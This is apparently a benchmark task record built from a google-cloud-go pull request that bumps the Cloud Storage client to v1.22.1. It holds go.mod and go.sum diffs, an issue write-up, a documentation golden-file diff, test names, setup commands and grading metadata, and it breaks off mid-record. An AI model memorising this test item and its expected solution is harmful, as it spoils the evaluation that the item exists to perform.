h1:Wv1Oy7z6Yz3DshWRJFhqM/UCfaWIRTdp0RXyy7KQOVs= cloud.google.com/go/storage v1.10.0/go.mod h1:FLPqc6j+Ki4BU591ie1oL6qBQGu2Bl/tZ9ullr3+Kg0= -cloud.google.com/go/storage v1.22.0 h1:NUV0NNp9nkBuW66BFRLuMgldN60C57ET3dhbwLIYio8= -cloud.google.com/go/storage v1.22.0/go.mod h1:GbaLEoMqbVm6sx3Z0R++gSiBlgMv6yUi2q1DeGFKQgE= +cloud.google.com/go/storage v1.22.1 h1:F6IlQJZrZM++apn9V5/VfS3gbTUYg98PS3EMQAzqtfg= +cloud.google.com/go/storage v1.22.1/go.mod h1:S8N1cAStu7BOeFfE8KAQzmyyLkK8p/vmRq6kuBTW58Y= dmitri.shuralyov.com/gpu/mtl v0.0.0-20190408044501-666a987793e9/go.mod h1:H6x//7gZCb22OMCxBHrMx7a5I7Hp++hsVxbQ4BYO7hU= github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= github.com/BurntSushi/xgb v0.0.0-20160522181843-27f122750802/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo= @@ -73,6 +73,7 @@ github.com/cncf/udpa/go v0.0.0-20210930031921-04548b0d99d4/go.mod h1:6pvJx4me5XP github.com/cncf/xds/go v0.0.0-20210312221358-fbca930ec8ed/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= github.com/cncf/xds/go v0.0.0-20210805033703-aa0b78936158/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= github.com/cncf/xds/go v0.0.0-20210922020428-25de7278fc84/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= +github.com/cncf/xds/go v0.0.0-20211001041855-01bcc9b48dfe/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= github.com/cncf/xds/go v0.0.0-20211011173535-cb28da3451f1/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= @@ -83,6 +84,7 @@ github.com/envoyproxy/go-control-plane v0.9.9-0.20201210154907-fd9021fe5dad/go.m github.com/envoyproxy/go-control-plane v0.9.9-0.20210217033140-668b12f5399d/go.mod h1:cXg6YxExXjJnVBQHBLXeUAgxn2UodCpnH306RInaBQk= github.com/envoyproxy/go-control-plane v0.9.9-0.20210512163311-63b5d3c536b0/go.mod 
h1:hliV/p42l8fGbc6Y9bQ70uLwIvmJyVE5k4iMKlh8wCQ= github.com/envoyproxy/go-control-plane v0.9.10-0.20210907150352-cf90f659a021/go.mod h1:AFq3mo9L8Lqqiid3OhADV3RfLJnjiw63cSpi+fDTRC0= +github.com/envoyproxy/go-control-plane v0.10.2-0.20220325020618-49ff273808a1/go.mod h1:KJwIaB5Mv44NWtYuAOFCVOjcI94vtpEz2JU/D2v6IjE= github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04= github.com/go-gl/glfw v0.0.0-20190409004039-e6da0acd62b1/go.mod h1:vR7hzQXu2zJy9AVAgeJqvqgH9Q5CA+iKCZ2gyEVpxRU= @@ -159,6 +161,7 @@ github.com/google/pprof v0.0.0-20210601050228-01bbb1931b22/go.mod h1:kpwsk12EmLe github.com/google/pprof v0.0.0-20210609004039-a478d1d731e9/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= github.com/google/pprof v0.0.0-20210720184732-4bb14d4b1be1/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= github.com/google/renameio v0.1.0/go.mod h1:KWCgfxg9yswjAJkECMjeO8J8rahYeXnNhOm40UhjYkI= +github.com/google/uuid v1.1.2 h1:EVhdT+1Kseyi1/pUmXKaFxYsDNy9RQYkMWRH68J/W7Y= github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/gax-go/v2 v2.0.4/go.mod h1:0Wqv26UfaUD9n4G6kQubkQ+KchISgw+vpHVxEJEs9eg= github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk= @@ -438,8 +441,9 @@ golang.org/x/tools v0.1.5/go.mod h1:o0xws9oXOQQZyjljx8fwUC0k7L1pTE6eaCbjGeHmOkk= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= -golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1 h1:go1bK/D/BFZV2I8cIQd1NKEZ+0owSTG1fDTci4IqFcE= golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod 
h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= +golang.org/x/xerrors v0.0.0-20220411194840-2f41105eb62f h1:GGU+dLjvlC3qDwqYgL6UgRmHXhOOgns0bZu2Ty5mm6U= +golang.org/x/xerrors v0.0.0-20220411194840-2f41105eb62f/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= google.golang.org/api v0.4.0/go.mod h1:8k5glujaEP+g9n7WNsDg8QP6cUVNI86fCNMcbazEtwE= google.golang.org/api v0.7.0/go.mod h1:WtwebWUNSVBH/HAw79HIFXZNqEvBhG+Ra+ax0hx3E3M= google.golang.org/api v0.8.0/go.mod h1:o4eAsZoiT+ibD93RtjEohWalFOjRDx6CVaqeizhEnKg= @@ -552,10 +556,10 @@ google.golang.org/genproto v0.0.0-20220222213610-43724f9ea8cf/go.mod h1:kGP+zUP2 google.golang.org/genproto v0.0.0-20220304144024-325a89244dc8/go.mod h1:kGP+zUP2Ddo0ayMi4YuN7C3WZyJvGLZRh8Z5wnAqvEI= google.golang.org/genproto v0.0.0-20220310185008-1973136f34c6/go.mod h1:kGP+zUP2Ddo0ayMi4YuN7C3WZyJvGLZRh8Z5wnAqvEI= google.golang.org/genproto v0.0.0-20220324131243-acbaeb5b85eb/go.mod h1:hAL49I2IFola2sVEjAn7MEwsja0xp51I0tlGAf9hz4E= -google.golang.org/genproto v0.0.0-20220405205423-9d709892a2bf/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= google.golang.org/genproto v0.0.0-20220407144326-9054f6ed7bac/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= -google.golang.org/genproto v0.0.0-20220413183235-5e96e2839df9 h1:XGQ6tc+EnM35IAazg4y6AHmUg4oK8NXsXaILte1vRlk= google.golang.org/genproto v0.0.0-20220413183235-5e96e2839df9/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= +google.golang.org/genproto v0.0.0-20220518221133-4f43b3371335 h1:2D0OT6tPVdrQTOnVe1VQjfJPTED6EZ7fdJ/f6Db6OsY= +google.golang.org/genproto v0.0.0-20220518221133-4f43b3371335/go.mod h1:RAyBrSAP7Fh3Nc84ghnVLDPuV51xc9agzmm4Ph6i0Q4= google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= google.golang.org/grpc v1.20.1/go.mod h1:10oTOabMzJvdu6/UiuZezV6QK5dSlG84ov/aaiqXj38= google.golang.org/grpc v1.21.1/go.mod h1:oYelfM1adQP15Ek0mdvEgi9Df8B9CZIaU1084ijfRaM= @@ -583,8 +587,9 @@ google.golang.org/grpc v1.39.1/go.mod 
h1:PImNr+rS9TWYb2O4/emRugxiyHZ5JyHW5F+RPnD google.golang.org/grpc v1.40.0/go.mod h1:ogyxbiOoUXAkP+4+xa6PZSE9DZgIHtSpzjDTB9KAK34= google.golang.org/grpc v1.40.1/go.mod h1:ogyxbiOoUXAkP+4+xa6PZSE9DZgIHtSpzjDTB9KAK34= google.golang.org/grpc v1.44.0/go.mod h1:k+4IHHFw41K8+bbowsex27ge2rCb65oeWqe4jJ590SU= -google.golang.org/grpc v1.45.0 h1:NEpgUqV3Z+ZjkqMsxMg11IaDrXY4RY6CQukSGK0uI1M= google.golang.org/grpc v1.45.0/go.mod h1:lN7owxKUQEqMfSyQikvvk5tf/6zMPsrK+ONuO11+0rQ= +google.golang.org/grpc v1.46.0 h1:oCjezcn6g6A75TGoKYBPgKmVBLexhYLM6MebdrPApP8= +google.golang.org/grpc v1.46.0/go.mod h1:vN9eftEi1UMyUsIF80+uQXhHjbXYbm0uXoFCACuMGWk= google.golang.org/grpc/cmd/protoc-gen-go-grpc v1.1.0/go.mod h1:6Kw0yEErY5E/yWrBtf03jp27GLLJujG4z/JK95pnjjw= google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8= google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0= diff --git a/profiler/go.mod b/profiler/go.mod index 76dd4fef14..ecb9c1fc18 100644 --- a/profiler/go.mod +++ b/profiler/go.mod @@ -5,13 +5,13 @@ go 1.16 require ( cloud.google.com/go v0.100.2 cloud.google.com/go/compute v1.6.0 - cloud.google.com/go/storage v1.22.0 + cloud.google.com/go/storage v1.22.1 github.com/golang/mock v1.6.0 github.com/golang/protobuf v1.5.2 github.com/google/pprof v0.0.0-20220412212628-83db2b799d1f github.com/googleapis/gax-go/v2 v2.3.0 golang.org/x/oauth2 v0.0.0-20220411215720-9780585627b5 google.golang.org/api v0.74.0 - google.golang.org/genproto v0.0.0-20220413183235-5e96e2839df9 - google.golang.org/grpc v1.45.0 + google.golang.org/genproto v0.0.0-20220518221133-4f43b3371335 + google.golang.org/grpc v1.46.0 ) diff --git a/profiler/go.sum b/profiler/go.sum index bc0966daad..8696aa3bce 100644 --- a/profiler/go.sum +++ b/profiler/go.sum @@ -52,8 +52,8 @@ cloud.google.com/go/storage v1.5.0/go.mod h1:tpKbwo567HUNpVclU5sGELwQWBDZ8gh0Zeo cloud.google.com/go/storage v1.6.0/go.mod 
h1:N7U0C8pVQ/+NIKOBQyamJIeKQKkZ+mxpohlUTyfDhBk= cloud.google.com/go/storage v1.8.0/go.mod h1:Wv1Oy7z6Yz3DshWRJFhqM/UCfaWIRTdp0RXyy7KQOVs= cloud.google.com/go/storage v1.10.0/go.mod h1:FLPqc6j+Ki4BU591ie1oL6qBQGu2Bl/tZ9ullr3+Kg0= -cloud.google.com/go/storage v1.22.0 h1:NUV0NNp9nkBuW66BFRLuMgldN60C57ET3dhbwLIYio8= -cloud.google.com/go/storage v1.22.0/go.mod h1:GbaLEoMqbVm6sx3Z0R++gSiBlgMv6yUi2q1DeGFKQgE= +cloud.google.com/go/storage v1.22.1 h1:F6IlQJZrZM++apn9V5/VfS3gbTUYg98PS3EMQAzqtfg= +cloud.google.com/go/storage v1.22.1/go.mod h1:S8N1cAStu7BOeFfE8KAQzmyyLkK8p/vmRq6kuBTW58Y= dmitri.shuralyov.com/gpu/mtl v0.0.0-20190408044501-666a987793e9/go.mod h1:H6x//7gZCb22OMCxBHrMx7a5I7Hp++hsVxbQ4BYO7hU= github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= github.com/BurntSushi/xgb v0.0.0-20160522181843-27f122750802/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo= @@ -73,6 +73,7 @@ github.com/cncf/udpa/go v0.0.0-20210930031921-04548b0d99d4/go.mod h1:6pvJx4me5XP github.com/cncf/xds/go v0.0.0-20210312221358-fbca930ec8ed/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= github.com/cncf/xds/go v0.0.0-20210805033703-aa0b78936158/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= github.com/cncf/xds/go v0.0.0-20210922020428-25de7278fc84/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= +github.com/cncf/xds/go v0.0.0-20211001041855-01bcc9b48dfe/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= github.com/cncf/xds/go v0.0.0-20211011173535-cb28da3451f1/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= @@ -83,6 +84,7 @@ github.com/envoyproxy/go-control-plane v0.9.9-0.20201210154907-fd9021fe5dad/go.m github.com/envoyproxy/go-control-plane v0.9.9-0.20210217033140-668b12f5399d/go.mod h1:cXg6YxExXjJnVBQHBLXeUAgxn2UodCpnH306RInaBQk= 
github.com/envoyproxy/go-control-plane v0.9.9-0.20210512163311-63b5d3c536b0/go.mod h1:hliV/p42l8fGbc6Y9bQ70uLwIvmJyVE5k4iMKlh8wCQ= github.com/envoyproxy/go-control-plane v0.9.10-0.20210907150352-cf90f659a021/go.mod h1:AFq3mo9L8Lqqiid3OhADV3RfLJnjiw63cSpi+fDTRC0= +github.com/envoyproxy/go-control-plane v0.10.2-0.20220325020618-49ff273808a1/go.mod h1:KJwIaB5Mv44NWtYuAOFCVOjcI94vtpEz2JU/D2v6IjE= github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04= github.com/go-gl/glfw v0.0.0-20190409004039-e6da0acd62b1/go.mod h1:vR7hzQXu2zJy9AVAgeJqvqgH9Q5CA+iKCZ2gyEVpxRU= @@ -161,6 +163,7 @@ github.com/google/pprof v0.0.0-20210720184732-4bb14d4b1be1/go.mod h1:kpwsk12EmLe github.com/google/pprof v0.0.0-20220412212628-83db2b799d1f h1:VrKTY4lquiy1oJzVZgXrauku9Jx9P+POv/gTLakG4Wk= github.com/google/pprof v0.0.0-20220412212628-83db2b799d1f/go.mod h1:Pt31oes+eGImORns3McJn8zHefuQl2rG8l6xQjGYB4U= github.com/google/renameio v0.1.0/go.mod h1:KWCgfxg9yswjAJkECMjeO8J8rahYeXnNhOm40UhjYkI= +github.com/google/uuid v1.1.2 h1:EVhdT+1Kseyi1/pUmXKaFxYsDNy9RQYkMWRH68J/W7Y= github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/gax-go/v2 v2.0.4/go.mod h1:0Wqv26UfaUD9n4G6kQubkQ+KchISgw+vpHVxEJEs9eg= github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk= @@ -441,8 +444,9 @@ golang.org/x/tools v0.1.5/go.mod h1:o0xws9oXOQQZyjljx8fwUC0k7L1pTE6eaCbjGeHmOkk= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= -golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1 h1:go1bK/D/BFZV2I8cIQd1NKEZ+0owSTG1fDTci4IqFcE= 
golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= +golang.org/x/xerrors v0.0.0-20220411194840-2f41105eb62f h1:GGU+dLjvlC3qDwqYgL6UgRmHXhOOgns0bZu2Ty5mm6U= +golang.org/x/xerrors v0.0.0-20220411194840-2f41105eb62f/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= google.golang.org/api v0.4.0/go.mod h1:8k5glujaEP+g9n7WNsDg8QP6cUVNI86fCNMcbazEtwE= google.golang.org/api v0.7.0/go.mod h1:WtwebWUNSVBH/HAw79HIFXZNqEvBhG+Ra+ax0hx3E3M= google.golang.org/api v0.8.0/go.mod h1:o4eAsZoiT+ibD93RtjEohWalFOjRDx6CVaqeizhEnKg= @@ -555,10 +559,10 @@ google.golang.org/genproto v0.0.0-20220222213610-43724f9ea8cf/go.mod h1:kGP+zUP2 google.golang.org/genproto v0.0.0-20220304144024-325a89244dc8/go.mod h1:kGP+zUP2Ddo0ayMi4YuN7C3WZyJvGLZRh8Z5wnAqvEI= google.golang.org/genproto v0.0.0-20220310185008-1973136f34c6/go.mod h1:kGP+zUP2Ddo0ayMi4YuN7C3WZyJvGLZRh8Z5wnAqvEI= google.golang.org/genproto v0.0.0-20220324131243-acbaeb5b85eb/go.mod h1:hAL49I2IFola2sVEjAn7MEwsja0xp51I0tlGAf9hz4E= -google.golang.org/genproto v0.0.0-20220405205423-9d709892a2bf/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= google.golang.org/genproto v0.0.0-20220407144326-9054f6ed7bac/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= -google.golang.org/genproto v0.0.0-20220413183235-5e96e2839df9 h1:XGQ6tc+EnM35IAazg4y6AHmUg4oK8NXsXaILte1vRlk= google.golang.org/genproto v0.0.0-20220413183235-5e96e2839df9/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= +google.golang.org/genproto v0.0.0-20220518221133-4f43b3371335 h1:2D0OT6tPVdrQTOnVe1VQjfJPTED6EZ7fdJ/f6Db6OsY= +google.golang.org/genproto v0.0.0-20220518221133-4f43b3371335/go.mod h1:RAyBrSAP7Fh3Nc84ghnVLDPuV51xc9agzmm4Ph6i0Q4= google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= google.golang.org/grpc v1.20.1/go.mod h1:10oTOabMzJvdu6/UiuZezV6QK5dSlG84ov/aaiqXj38= google.golang.org/grpc v1.21.1/go.mod h1:oYelfM1adQP15Ek0mdvEgi9Df8B9CZIaU1084ijfRaM= @@ -586,8 
+590,9 @@ google.golang.org/grpc v1.39.1/go.mod h1:PImNr+rS9TWYb2O4/emRugxiyHZ5JyHW5F+RPnD google.golang.org/grpc v1.40.0/go.mod h1:ogyxbiOoUXAkP+4+xa6PZSE9DZgIHtSpzjDTB9KAK34= google.golang.org/grpc v1.40.1/go.mod h1:ogyxbiOoUXAkP+4+xa6PZSE9DZgIHtSpzjDTB9KAK34= google.golang.org/grpc v1.44.0/go.mod h1:k+4IHHFw41K8+bbowsex27ge2rCb65oeWqe4jJ590SU= -google.golang.org/grpc v1.45.0 h1:NEpgUqV3Z+ZjkqMsxMg11IaDrXY4RY6CQukSGK0uI1M= google.golang.org/grpc v1.45.0/go.mod h1:lN7owxKUQEqMfSyQikvvk5tf/6zMPsrK+ONuO11+0rQ= +google.golang.org/grpc v1.46.0 h1:oCjezcn6g6A75TGoKYBPgKmVBLexhYLM6MebdrPApP8= +google.golang.org/grpc v1.46.0/go.mod h1:vN9eftEi1UMyUsIF80+uQXhHjbXYbm0uXoFCACuMGWk= google.golang.org/grpc/cmd/protoc-gen-go-grpc v1.1.0/go.mod h1:6Kw0yEErY5E/yWrBtf03jp27GLLJujG4z/JK95pnjjw= google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8= google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0=
chore(all): bump storage to latest release
**Title** Update Cloud Storage client to the latest patch release across all modules **Problem** The repository was still using an older Cloud Storage client (v1.22.0). That version misses recent fixes and may cause compatibility or security issues for services that depend on it. **Root Cause** The go.mod files pinned the storage library to an outdated patch version, and transitive dependencies were not aligned with the newer storage release. **Fix / Expected Behavior** - Bump the Cloud Storage client to v1.22.1 in every module that depends on it. - Refresh go.mod and go.sum entries to reflect the new storage version and its transitive requirements. - Update related indirect dependencies (e.g., gRPC, genproto, UUID, xerrors) to versions compatible with the upgraded storage client. - Ensure the repository builds cleanly with the updated dependency graph. **Risk & Validation** - Run the full test suite for all services to confirm no compile‑time or run‑time regressions. - Verify that the updated storage client does not introduce breaking API changes by exercising common storage operations in integration tests. - Check that the go.mod/go.sum changes do not unintentionally upgrade unrelated dependencies.
6,069
googleapis/google-cloud-go
diff --git a/internal/godocfx/testdata/golden/index.yml b/internal/godocfx/testdata/golden/index.yml index 15e7ea3301..ccc6d95733 100644 --- a/internal/godocfx/testdata/golden/index.yml +++ b/internal/godocfx/testdata/golden/index.yml @@ -2491,6 +2491,9 @@ items: attribute is specified, the content type will be automatically sniffed using net/http.DetectContentType. + Note that each Writer allocates an internal buffer of size Writer.ChunkSize. + See the ChunkSize docs for more information. + It is the caller's responsibility to call Close when writing is done. To stop writing without saving the data, cancel the context. parent: cloud.google.com/go/storage.ObjectHandle @@ -3503,18 +3506,22 @@ items: ChunkSize controls the maximum number of bytes of the object that the\n\t// Writer will attempt to send to the server in a single request. Objects\n\t// smaller than the size will be sent in a single request, while larger\n\t// objects - will be split over multiple requests. The size will be rounded up\n\t// to the - nearest multiple of 256K.\n\t//\n\t// ChunkSize will default to a reasonable - value. If you perform many\n\t// concurrent writes of small objects (under ~8MB), - you may wish set ChunkSize\n\t// to a value that matches your objects' sizes - to avoid consuming large\n\t// amounts of memory. See\n\t// https://cloud.google.com/storage/docs/json_api/v1/how-tos/upload#size\n\t// + will be split over multiple requests. The value will be rounded up\n\t// to + the nearest multiple of 256K. The default ChunkSize is 16MiB.\n\t//\n\t// Each + Writer will internally allocate a buffer of size ChunkSize. 
This is\n\t// used + to buffer input data and allow for the input to be sent again if a\n\t// request + must be retried.\n\t//\n\t// If you upload small objects (< 16MiB), you should + set ChunkSize\n\t// to a value slightly larger than the objects' sizes to avoid + memory bloat.\n\t// This is especially important if you are uploading many small + objects\n\t// concurrently. See\n\t// https://cloud.google.com/storage/docs/json_api/v1/how-tos/upload#size\n\t// for more information about performance trade-offs related to ChunkSize.\n\t//\n\t// If ChunkSize is set to zero, chunking will be disabled and the object will\n\t// be uploaded in a single request without the use of a buffer. This will\n\t// further reduce memory used during uploads, but will also prevent the writer\n\t// - from retrying in case of a transient error from the server, since a buffer\n\t// - is required in order to retry the failed request.\n\t//\n\t// ChunkSize must - be set before the first Write call.\n\tChunkSize <a href=\"https://pkg.go.dev/builtin#int\">int</a>\n\n\t// + from retrying in case of a transient error from the server or resuming an\n\t// + upload that fails midway through, since the buffer is required in order to\n\t// + retry the failed request.\n\t//\n\t// ChunkSize must be set before the first + Write call.\n\tChunkSize <a href=\"https://pkg.go.dev/builtin#int\">int</a>\n\n\t// ChunkRetryDeadline sets a per-chunk retry deadline for multi-chunk\n\t// resumable uploads.\n\t//\n\t// For uploads of larger files, the Writer will attempt to retry if the\n\t// request to upload a particular chunk fails with a transient
[ "TestRetryableErrors", "TestCopy", "TestTables", "TestModels", "TestRoutines", "TestDatasets", "TestDatasetToBQ", "TestBQToDatasetMetadata", "TestDatasetMetadataToUpdateToBQ", "TestConvertAccessEntry", "TestDatasetIdentifiers", "TestPutMultiErrorString", "TestMultiErrorString", "TestErrorFromErrorProto", "TestErrorString", "TestExternalDataConfig", "TestQuote", "TestQualifier", "TestExtract", "TestExtractModel", "TestFileConfigPopulateLoadConfig", "TestFileConfigPopulateExternalDataConfig", "TestPolicyConversions", "TestNewInsertRequest", "TestNewInsertRequestErrors", "TestHandleInsertErrors", "TestValueSavers", "TestValueSaversErrors", "TestParseInterval", "TestCanonicalInterval", "TestIntervalDuration", "TestRowIteratorCacheBehavior", "TestIterator", "TestNextDuringErrorState", "TestNextAfterFinished", "TestIteratorNextTypes", "TestIteratorSourceJob", "TestCreateJobRef", "TestLoad", "TestBQToModelMetadata", "TestModelMetadataUpdateToBQ", "TestModelIdentifiers", "TestNullsJSON", "TestNullFloat64JSON", "TestNullFloat64JSON/float_value", "TestNullFloat64JSON/minus_infinity", "TestNullFloat64JSON/short_infinity", "TestNullFloat64JSON/positive_short_infinity", "TestNullFloat64JSON/long_infinity", "TestNullFloat64JSON/null", "TestNullFloat64JSON/minus_short_infinity", "TestNullFloat64JSON/NaN", "TestParamValueScalar", "TestParamValueArray", "TestParamValueStruct", "TestParamValueErrors", "TestParamType", "TestParamTypeErrors", "TestConvertParamValue", "TestQueryParameter_toBQ", "TestQuery", "TestProbeFastPath", "TestConfiguringQuery", "TestQueryLegacySQL", "TestRead", "TestNoMoreValues", "TestReadError", "TestReadTabledataOptions", "TestReadQueryOptions", "TestRoutineTypeConversions", "TestRoutineTypeConversions/ToRoutineMetadata/empty", "TestRoutineTypeConversions/ToRoutineArgument/empty", "TestRoutineTypeConversions/FromRoutineMetadataToUpdate/null_fields", "TestRoutineTypeConversions/FromRoutineMetadataToUpdate/body_and_libs", 
"TestRoutineTypeConversions/ToRoutineMetadata/basic", "TestRoutineTypeConversions/ToRoutineArgument/basic", "TestRoutineTypeConversions/FromRoutineArgument/empty", "TestRoutineTypeConversions/FromRoutineArgument/basic", "TestRoutineIdentifiers", "TestRelaxSchema", "TestSchemaConversion", "TestSimpleInference", "TestNestedInference", "TestRepeatedInference", "TestNullInference", "TestEmbeddedInference", "TestRecursiveInference", "TestTagInference", "TestTagInferenceErrors", "TestSchemaErrors", "TestHasRecursiveType", "TestSchemaFromJSON", "TestSchemaToJSONFields", "TestBQToStandardSQLDataType", "TestBQToStandardSQLField", "TestBQToStandardSQLStructType", "TestBQToTableMetadata", "TestTableMetadataToBQ", "TestTableMetadataToUpdateToBQ", "TestTableMetadataToUpdateToBQErrors", "TestTableIdentifiers", "TestConvertBasicValues", "TestConvertTime", "TestConvertSmallTimes", "TestConvertTimePrecision", "TestConvertTimePrecision/1555593697.154358", "TestConvertTimePrecision/1555593697.154359", "TestConvertTimePrecision/1555593697.154360", "TestConvertNullValues", "TestBasicRepetition", "TestNestedRecordContainingRepetition", "TestRepeatedRecordContainingRepetition", "TestRepeatedRecordContainingRecord", "TestConvertRowErrors", "TestValuesSaverConvertsToMap", "TestValuesToMapErrors", "TestStructSaver", "TestStructSaverErrors", "TestNumericStrings", "TestConvertRows", "TestValueList", "TestValueMap", "TestStructLoader", "TestStructLoaderRepeated", "TestStructLoaderNullable", "TestStructLoaderOverflow", "TestStructLoaderFieldOverlap", "TestStructLoaderErrors", "ExampleInferSchema", "ExampleInferSchema_tags" ]
[]
No new interfaces are introduced.
Apache-2.0
{ "base_image_name": "go_1.19.13", "install": [ "export DEBIAN_FRONTEND=noninteractive", "apt-get update", "apt-get install -y -qq golang", "export GOPATH=/root/go", "export GOMODCACHE=$GOPATH/pkg/mod", "export GOCACHE=/root/.cache/go-build", "export XDG_CACHE_HOME=/root/.cache", "mkdir -p $GOPATH", "mkdir -p $GOCACHE", "cd /google-cloud-go", "go mod download" ], "log_parser": "parse_log_gotest", "test_cmd": "cd /google-cloud-go/bigquery && go test -v ." }
{ "num_modified_files": 10, "num_modified_lines": 40, "pr_author": "codyoss", "pr_labels": [ "size: m: Pull request size is medium." ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "dev_ops_enh" ], "reason": null, "reasoning": "The issue simply requests bumping the cloud.google.com/go/storage dependency to its latest release, which is clearly stated and matches the version updates in the provided patches. The test changes adjust generated documentation to reflect the new storage version and related ChunkSize details, aligning with the bump request. No mismatch or hidden requirements are present, and there are no signals of B‑category problems. Therefore the task is solvable (A) and represents a straightforward dev‑ops enhancement.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, 